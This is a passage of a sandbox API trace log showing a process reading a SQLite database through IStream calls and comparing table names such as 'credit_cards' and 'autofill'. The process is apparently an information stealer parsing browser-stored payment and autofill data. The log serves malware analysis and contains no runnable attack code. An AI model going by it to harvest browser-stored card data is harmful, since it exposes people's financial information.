dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0591.066] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1a20 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:SetSize (This=0x63a0f8, libNewSize=0x5d1a20) returned 0x0 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0xa1) returned 0x63ff30 [0591.066] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x25, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d8d8 [0591.066] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x2d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0x5d5258 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0f8, libOffset=0x2e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:SetSize (This=0x63a0f8, libNewSize=0x5d5258) returned 0x0 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x596288 [0591.066] LocalFree (hMem=0x5d5258) returned 0x0 [0591.066] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.066] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.066] lstrcmpiA (lpString1="autofill_name_value_lower", lpString2="autofill") returned 1 [0591.066] LocalFree (hMem=0x58d548) returned 0x0 [0591.066] LocalFree (hMem=0x63ff30) returned 0x0 [0591.066] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.066] LocalFree (hMem=0x58d970) returned 0x0 [0591.066] LocalFree (hMem=0x596288) returned 0x0 [0591.066] LocalFree (hMem=0x570078) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x6147, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x6147, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x6148, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x6149, cb=0x0, dwLockType=0x0) returned 0x0 [0591.066] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.066] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.066] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.066] IStream:LockRegion (This=0x63a0a8, libOffset=0x614a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.067] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.067] LocalFree (hMem=0x2edb848) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0591.067] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x58d8d8) returned 0x0 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.067] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x58d8d8) returned 0x0 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0591.067] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x24, cb=0x0, dwLockType=0x0) returned 0x0 [0591.067] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0591.067] LocalAlloc (uFlags=0x40, uBytes=0x1c6) returned 0x5e3270 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.067] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x25, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0f8, libNewSize=0x5e3270) returned 0x0 [0591.068] LocalAlloc (uFlags=0x40, uBytes=0x1ce) returned 0x5e3098 [0591.068] LocalFree (hMem=0x5e3270) returned 0x0 [0591.068] LocalFree (hMem=0x570078) returned 0x0 [0591.068] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.068] lstrcmpiA (lpString1="credit_cards", lpString2="autofill") returned 1 [0591.068] LocalFree (hMem=0x58d970) returned 0x0 [0591.068] LocalFree (hMem=0x56ff38) returned 0x0 [0591.068] LocalFree (hMem=0x56fe98) returned 0x0 [0591.068] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.068] LocalFree (hMem=0x5e3098) returned 0x0 [0591.068] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x610e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x610e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x610f, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.068] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.068] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0a8, libOffset=0x6110, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.068] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.068] LocalFree (hMem=0x2edb848) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.068] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.068] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0591.068] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.068] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.068] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.069] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0591.069] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.069] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1a20 [0591.069] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0f8, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0f8, libNewSize=0x5d1a20) returned 0x0 [0591.069] LocalAlloc (uFlags=0x40, uBytes=0xa7) returned 0x63ff30 [0591.069] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.069] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0591.069] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0f8, libOffset=0x2a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0f8, libNewSize=0x58d970) returned 0x0 [0591.069] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.069] LocalFree (hMem=0x58d970) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0f8, libOffset=0x36, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.069] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0591.069] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.069] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.069] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.069] lstrcmpiA (lpString1="sqlite_autoindex_credit_cards_1", lpString2="autofill") returned 1 [0591.069] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.069] LocalFree (hMem=0x63ff30) returned 0x0 [0591.069] LocalFree (hMem=0x56ff38) returned 0x0 [0591.069] LocalFree (hMem=0x58d970) returned 0x0 [0591.069] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.069] LocalFree (hMem=0x56fe98) returned 0x0 [0591.069] LocalFree (hMem=0x2eff7f8) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x7f6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x7f6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dad8) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x7fa, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dabb) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x6800, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x6800, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7f) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x6801, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x6803, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x6805, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x6807, cb=0x0, dwLockType=0x0) returned 0x0 [0591.069] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7f) returned 0x0 [0591.069] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2eff7f8 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.069] IStream:LockRegion (This=0x63a0a8, libOffset=0x6808, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x680a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x680c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x680e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6810, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6812, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6814, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6816, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da7e) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.070] IStream:LockRegion (This=0x63a0a8, libOffset=0x6818, cb=0x0, dwLockType=0x0) returned 0x0 [0591.070] IStream:SetSize (This=0x63a0a8, 